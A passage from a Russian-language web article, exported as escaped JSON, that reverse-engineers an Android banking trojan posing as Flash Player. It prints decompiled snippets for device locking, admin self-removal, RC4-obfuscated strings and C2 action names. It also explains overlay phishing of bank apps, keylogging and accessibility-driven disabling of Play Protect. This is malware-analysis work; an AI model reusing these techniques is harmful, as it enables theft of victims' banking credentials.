\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0434\u0435\u0432\u0430\u0439\u0441\u0430. \u0414\u0435\u0432\u0430\u0439\u0441 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0446\u0438\u043a\u043b\u0435 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.<\/p>\n<pre><code class=\"java\">DevicePolicyManager deviceManager = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);      deviceManager.lockNow();<\/code><\/pre>\n<p>  \u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 \u0443\u043c\u0435\u0435\u0442 \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430, \u0432\u0438\u0434\u0438\u043c\u043e \u0430\u0432\u0442\u043e\u0440 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u044d\u0442\u043e \u0440\u0435\u0448\u0438\u043b \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0434\u043b\u044f \u00ab\u0441\u0430\u043c\u043e\u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0435\u043d\u0438\u044f\u00bb \u043c\u0430\u043b\u0432\u0430\u0440\u0438, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043b\u0435\u0434\u043e\u0432 \u043d\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0435 \u0436\u0435\u0440\u0442\u0432.<\/p>\n<pre><code class=\"java\">    ComponentName componentName = new ComponentName(this, DeviceAdmin.class);     DevicePolicyManager devicePolicyManager = (DevicePolicyManager) getSystemService(Context.DEVICE_POLICY_SERVICE);     devicePolicyManager.removeActiveAdmin(componentName);<\/code><\/pre>\n<p>  \u0422\u0430\u043a \u0436\u0435 \u0446\u0438\u043a\u043b \u0438\u043c\u0435\u0435\u0442 2 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 \u0440\u0430\u0431\u043e\u0442\u044b, 1 \u0441\u0435\u043a\u0443\u043d\u0434\u0430 \u0438 8 \u0441\u0435\u043a\u0443\u043d\u0434, \u0435\u0441\u043b\u0438 Accessibility Service \u043e\u0442\u043b\u044e\u0447\u0435\u043d, \u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 1-\u0439 \u0441\u0435\u043a\u0443\u043d\u0434\u0435 \u0438 \u043f\u0440\u043e\u0441\u0438\u0442 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441, \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044f Activity \u0438 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u044d\u0442\u043e \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c.<\/p>\n<p>  \u0412 \u043a\u043e\u043d\u0446\u0435 \u0446\u0438\u043a\u043b\u0430 \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043a\u0430\u043a \u0438 \u0432 Service_server, \u0430 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u043c\u0435\u0442\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u043c\u043e\u0434\u0443\u043b\u044f \u00absystem.apk\u00bb, \u043d\u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043d\u0435 \u043c\u043d\u043e\u0433\u043e \u0434\u0440\u0443\u0433\u0438\u0435, \u0441\u043c\u043e\u0442\u0440\u0438\u043c JSON:<\/p>\n<pre><code class=\"json\">    {         \"params\":\"serviceWorkingWhile\",         \"tick\":\"100\",         \"idbot\":\"qoietjeoisfhjdfhk\",         \"accessibility\":\"1\"     }<\/code><\/pre>\n<p>  tick \u2014 \u0441\u0435\u043a\u0443\u043d\u0434\u044b \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0447\u0438\u0442\u0430\u0435\u0442 \u0446\u0438\u043a\u043b \u0441\u0435\u0440\u0432\u0438\u0441\u0430, accessibility \u2014 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043b\u0438 Accesibility Service.<\/p>\n<h2>\u041a\u043b\u0430\u0441\u0441 String(s)<\/h2>\n<p>  \u0412\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043b\u0430\u0441\u0441 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0430 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u043e\u043c RC4, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432 base64.<\/p>\n<p>  \u041f\u0440\u0438\u043c\u0435\u0440:<\/p>\n<p>  \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u0442\u0440\u043e\u043a\u0430: yyshybiwijujYzdkZDdkMjRlYjJmYjU5Y2Qw<br \/>  \u0433\u0434\u0435 \u043f\u0435\u0440\u0432\u044b\u0435 12 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 \u0441\u0442\u0440\u0430\u043a\u0438 \u044d\u0442\u043e \u043a\u043b\u044e\u0447\u044c \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u043b\u0433\u0430\u0440\u0438\u0442\u043c\u0430 RC4<br \/>  \u041a\u043b\u044e\u0447\u0438: yyshybiwijuj<br \/>  \u0417\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0442\u0435\u043a\u0441\u0442: YzdkZDdkMjRlYjJmYjU5Y2Qw<\/p>\n<p>  \u0412\u043e\u0442 \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u0434\u0430 \u043a\u043b\u0430\u0441\u0441\u0430 String(s)<\/p>\n<pre><code class=\"java\">    \/* renamed from: A *\/     public final String f0A = mo1a(\"yyshybiwijujYzdkZDdkMjRlYjJmYjU5Y2Qw\");      \/* renamed from: B *\/     public final String f1B = mo1a(\"dfpzkejthefgZDA1NTUyNmJiYWU4M2ViMjhjMGJmNTYx\");      \/* renamed from: C *\/     public final String f2C = mo1a(\"ewpskxnrtsvaMTBkOWRmZDAxZTZjNjkxZjhiYzYyOA==\");      \/* renamed from: D *\/     public final String f3D = mo1a(\"ugqxhrpujzmaYTgwZjQ0NjBhN2Y1YmM1MDhjZjdkZWEwYzljZGIxOWY4NDEy\");      \/* renamed from: E *\/     public final String f4E = mo1a(\"xlzrjjolkozwZTRjOGY5OTZjMTExMTgwYTE0ZGQ=\");      \/* renamed from: F *\/     public final String f5F = mo1a(\"wtxndsosbhnaYzZjNzhhYzA2MDMyMTBkOA==\");      \/* renamed from: G *\/     public final String f6G = mo1a(\"nmibahlxjjsxM2IzNjY4NGUyZDIzYmYwZGVi\");      \/* renamed from: H *\/     public final String f7H = mo1a(\"vvgipgmxvxloN2NmZDdlNTkyNjRhYWVlMzkzZGIzMGFiYTUzM2E5\");      \/* renamed from: I *\/     public final String f8I = mo1a(\"zuqkhqhqsrvgMDczYWRkZmYyOTE5NmVmMzk2Yzc=\");<\/code><\/pre>\n<p>  \u042f \u043d\u0430\u043f\u0438\u0441\u0430\u043b \u0441\u043a\u0440\u0438\u043f\u0442, \u0434\u043b\u044f \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0441\u0442\u0440\u043e\u043a \u0432 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0432\u0438\u0434, \u044d\u0442\u043e \u043f\u043e\u043c\u043e\u0433\u043b\u043e \u043c\u043d\u0435 \u0441\u043a\u043e\u0440\u043e\u0442\u0430\u0442\u044c \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438. <\/p>\n<pre><code class=\"java\">    \/* renamed from: A *\/     public final String str_statMails = \"statMails\";      \/* renamed from: B *\/     public final String str_activeDevice = \"activeDevice\";      \/* renamed from: C *\/     public final String str_timeWorking = \"timeWorking\";      \/* renamed from: D *\/     public final String str_statDownloadModule = \"statDownloadModule\";      \/* renamed from: E *\/     public final String str_lockDevice = \"lockDevice\";      \/* renamed from: F *\/     public final String str_offSound = \"offSound\";      \/* renamed from: G *\/     public final String str_keylogger = \"keylogger\";      \/* renamed from: H *\/     public final String str_activeInjection = \"activeInjection\";      \/* renamed from: I *\/     public final String str_timeInject = \"timeInject\";<\/code><\/pre>\n<p>  \u0422\u0430\u043a \u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u0447\u0442\u043e \u0432 \u044d\u0442\u043e\u043c \u043a\u043b\u0430\u0441\u0441\u0435 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f:<\/p>\n<pre><code class=\"java\">    \/* renamed from: ay *\/     public final String str_url = \"https:\/\/twitter.com\/LukasStefanko\";      \/* renamed from: az *\/     public final String str_Accessibility = \"Flash Player Service\";      \/* renamed from: bb *\/     public final String str_gate1 = \"action=registration&amp;data=\";      \/* renamed from: bc *\/     public final String str_gate2 = \"action=sendInjectLogs&amp;data=\";      \/* renamed from: bd *\/     public final String str_gate3 = \"action=sendSmsLogs&amp;data=\";      \/* renamed from: be *\/     public final String str_gate4 = \"action=timeInject&amp;data=\";      \/* renamed from: bf *\/     public final String str_gate5 = \"action=sendKeylogger&amp;data=\";      \/* renamed from: bg *\/     public final String str_gate6 = \"action=getModule&amp;data=\";      \/* renamed from: bh *\/     public final String str_gate7 = \"action=checkap&amp;data=\";      \/* renamed from: bj *\/     public final String str_country = \"[ua][ru][by][tj][uz][tm][az][am][kz][kg][md]\";<\/code><\/pre>\n<p>  URL \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0443\u043a\u0430\u0437\u0430\u043d \u0442\u0432\u0438\u0442\u0442\u0435\u0440 \u0440\u0435\u0441\u0435\u0447\u0435\u0440\u0430 Lukas Stefanko(@LukasStefanko), \u0432\u0438\u0434\u0438\u043c\u043e \u0430\u0432\u0442\u043e\u0440 \u0445\u043e\u0442\u0435\u043b \u043f\u043e\u0448\u0443\u0442\u0438\u0442\u044c \u0438\u043b\u0438 \u0447\u0442\u043e-\u0442\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c \u041b\u0443\u043a\u0430\u0441\u0443 (\u042d\u0442\u043e \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a \u0438\u0437 NOD32), \u0442\u0430\u043a \u0436\u0435 \u0442\u0443\u0442 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0438\u043c\u044f Accessibility Service + \u0442\u043e \u0436\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432 \u043c\u0430\u043d\u0438\u0444\u0435\u0441\u0442\u0435 android:label=\u00abFlash Player Service\u00bb, \u0438 \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u0442\u0440\u0430\u043d, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043c\u0430\u043b\u0432\u0430\u0440\u044c.<\/p>\n<h2>\u041e\u0441\u0442\u0430\u043b\u044c\u043d\u043e\u0435<\/h2>\n<p>  \u041a\u0440\u0430\u0442\u043a\u043e \u043e\u043f\u0438\u0448\u0443 \u0440\u0430\u0431\u043e\u0442\u0443 \u0438\u043d\u0436\u0435\u043a\u0442\u043e\u0432. \u041e\u043d\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u043f\u0440\u043e\u0441\u0442\u043e, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d Accessibility Service, \u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u0440\u043e\u0441\u0442\u043e \u043b\u043e\u0432\u0438\u0442 \u0441\u043e\u0431\u044b\u0442\u0438\u0435 \u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u043e\u0432\u0435\u0440\u0445 \u0430\u043a\u0442\u0438\u0432\u0438\u0442\u0438 \u0431\u0430\u043d\u043a\u0430 \u0441\u0432\u043e\u0435 \u0430\u043a\u0442\u0438\u0432\u0438\u0442\u0438, \u0433\u0434\u0435 \u043e\u043d\u043e \u0438\u043c\u0435\u0435\u0442 \u043e\u0431\u044a\u0435\u043a\u0442 WebView \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0433\u0440\u0443\u0436\u0430\u0435\u0442 html-\u0444\u0435\u0439\u043a \u0431\u0430\u043d\u043a\u0430, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e JavaScript \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u043c\u0430\u043b\u0432\u0430\u0440\u0438.<\/p>\n<p>  \u0422\u0430\u043a \u0436\u0435 \u0432 \u044d\u0442\u043e\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d Keylogger, \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u0438 \u0430\u0432\u0442\u043e\u043a\u043b\u0438\u043a \u043f\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f\u043c\u0438. \u0411\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u00abcom.miui.securitycenter\u00bb. \u042d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u00ab\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u00bb \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u0434\u0435\u0432\u0430\u0439\u0441\u0430\u0445 Xiaomi, \u0435\u0433\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u0441\u043b\u0435\u0434\u0438\u0442\u044c \u0437\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e \u0432\u0430\u0448\u0438\u0445 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u0422\u0430\u043a \u0436\u0435 \u0431\u044b\u043b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d \u043a\u043e\u0434 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u00abGoogle Play Protect\u00bb \u043c\u0435\u0442\u043e\u0434\u043e\u043c \u0430\u0432\u0442\u043e\u043a\u043b\u0438\u043a\u0430.<\/p>\n<h2>\u041f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043a \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435<\/h2>\n<p>  \u041c\u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043d\u0430\u0439\u0442\u0438 \u0442\u0432\u0438\u0442\u0442\u0435\u0440 \u0437\u043b\u043e\u0434\u0435\u0435\u0432 \u0438 \u0434\u043e\u0431\u044b\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0430\u0434\u043c\u0438\u043d \u043f\u0430\u043d\u0435\u043b\u0438<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/ff3\/d9e\/c29\/ff3d9ec29b0ab525130052b32a9d2a10.png\" alt=\"image\"><\/p>\n<p>  \u0423\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e apk-\u043f\u0430\u043a\u0435\u0442 \u043d\u0430 \u044d\u043c\u0443\u043b\u044f\u0442\u043e\u0440 \u0441 API 27.<\/p>\n<p>  \u041d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u0441\u0442\u043e\u043b\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0438\u043a\u043e\u043d\u043a\u0430 \u0444\u043b\u0435\u0448 \u043f\u043b\u0435\u0435\u0440\u0430 \u0441 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u00abFlash Player\u00bb<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043d\u0448\u043e\u0442<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/ff2\/516\/805\/ff25168051a4d17b8b22b15daac7244a.png\" alt=\"image\">  <\/div>\n<\/div>\n<p>  \u0416\u0434\u0435\u043c \u043f\u043e \u0438\u043a\u043e\u043d\u043a\u0435, \u0438 \u0443 \u043d\u0430\u0441 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u043c\u0430\u043b\u0432\u0430\u0440\u044c.<\/p>\n<p>  \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043c\u0430\u043b\u0432\u0430\u0440\u0438, \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0410\u043a\u0442\u0438\u0432\u0442\u0438\u0432\u0438 \u0441 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f Accessibility Service, \u0435\u0441\u043b\u0438 \u0441\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u0435\u0435, \u043e\u043d\u0430 \u043f\u043e\u044f\u0432\u0438\u0442\u0441\u044f \u0441\u043d\u043e\u0432\u0430 \u0438 \u044d\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432 \u0446\u0438\u043a\u043b\u0435 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440 \u043f\u043e\u043a\u0430 \u044f \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0438\u043b \u0441\u0435\u0440\u0432\u0438\u0441.<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043d\u0448\u043e\u0442<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/9c9\/cbd\/98c\/9c9cbd98c2afaf3750d131a5003e9c9e.png\" alt=\"image\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/e1d\/9c1\/48e\/e1d9c148e24105b8db66848ae777fd79.png\" alt=\"image\">  <\/div>\n<\/div>\n<p>  \u041f\u043e\u0441\u043b\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0433\u0430\u043b\u043e\u0447\u043a\u0438 Accessibility Service, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b\u0441\u044f \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b, \u0438 \u0431\u043e\u043b\u044c\u0448\u0435 \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 Accessibility Service, \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u0447\u0435\u0437\u043b\u0430 \u0438\u043a\u043e\u043d\u043a\u0430 \u0441 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u0441\u0442\u043e\u043b\u0430, \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0435\u043a\u0443\u043d\u0434 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f Doze Mode, \u043e\u043d \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u043b\u0441\u044f \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0430\u0432\u0442\u043e\u043a\u043b\u0438\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439. <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043d\u0448\u043e\u0442<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/d57\/1b2\/841\/d571b28415c001fa433e5c171aecb2a1.png\" alt=\"image\">  <\/div>\n<\/div>\n<p>  C\u043b\u0435\u0434\u043e\u043c \u0442\u0430\u043a\u0438\u043c \u0436\u0435 \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0431\u044b\u043b\u043e \u0430\u0432\u0442\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430. \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u0432 \u0440\u0443\u0447\u043d\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0442\u0430\u043a \u043a\u0430\u043a \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0431\u044b\u043b \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0432\u044b\u0445\u043e\u0434 \u043d\u0430\u0437\u0430\u0434 (GLOBAL_ACTION_BACK).<\/p>\n<p>  \u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u044d\u0442\u043e \u0432\u0441\u0435 \u043f\u043e \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438, \u0432 \u0441\u043a\u043e\u0440\u043e\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0430\u043f\u0438\u0448\u0443 \u0432\u0442\u043e\u0440\u0443\u044e \u0447\u0430\u0441\u0442\u044c \u0441 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0441 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u043c\u043e\u0434\u0443\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0431\u043e\u0442\u0430, \u0442\u0430\u043a \u043a\u0430\u043a \u043d\u0430\u0439\u0442\u0438 apk \u0444\u0430\u0439\u043b \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u0441 \u0432\u0430\u043b\u0438\u0434\u043d\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u043c\u043d\u0435 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c.<\/p>\n<p>  \u0420\u0435\u0432\u0435\u0440\u0441 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u0431\u044b\u043b \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e \u0441 <a href=\"https:\/\/habr.com\/ru\/users\/keklick1337\/\" class=\"user_link\">keklick1337<\/a><\/div>\n<p>               <script class=\"js-mediator-script\">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement(\"script\"),r.type=\"text\/javascript\",r.async=!0,r.defer=!0,r.src=t,r.charset=\"UTF-8\";var d=function(){var e=a.getElementsByTagName(\"script\")[0];e.parentNode.insertBefore(r,e)};\"[object Opera]\"==e.opera?a.addEventListener?a.addEventListener(\"DOMContentLoaded\",d,!1):e.attachEvent(\"onload\",d):d()}}}t(\"\/\/mediator.mail.ru\/script\/2820404\/\",\"_mediator\")}(window);<\/script>     <br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/post\/459858\/\"> https:\/\/habr.com\/ru\/post\/459858\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/5fb\/391\/192\/5fb39119247d45dfa979392da83f34f1.png\" alt=\"image\"><\/p>\n<p>  \u041d\u0430 \u043d\u043e\u0441\u0443 \u0443\u0436\u0435 2020 \u0433\u043e\u0434 \u0438 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0443\u0436\u0435 \u0432\u0435\u0440\u0441\u0438\u044e Android 9.0 Pie, \u0433\u0434\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Google \u0431\u044c\u0435\u0442 \u0441\u0435\u0431\u0435 \u0432 \u0433\u0440\u0443\u0434\u044c \u0438 